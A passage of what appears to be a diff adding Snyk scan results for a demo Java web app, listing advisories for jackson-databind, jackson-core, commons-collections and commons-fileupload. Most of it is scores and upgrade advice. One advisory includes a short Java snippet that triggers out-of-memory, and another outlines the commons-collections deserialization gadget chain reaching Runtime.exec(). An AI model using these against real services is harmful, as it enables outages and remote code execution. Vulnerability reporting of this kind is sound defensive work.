"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted 
Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the 
Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + 
"alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "TERASOLUNA Framework Development Team" + ], + "semver": { + "vulnerable": [ + "[1.3,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h", + "title": "Apache-SVN" + }, + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092", + "title": "CVE Details" + }, + { + 
"url": "https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml%23L84", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349475", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:38.873057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:48.463842Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:14.033291Z" + }, + { + 
"type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.791816Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n", + "epssDetails": { + "percentile": "0.92395", + "probability": "0.04275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3092" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-22T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 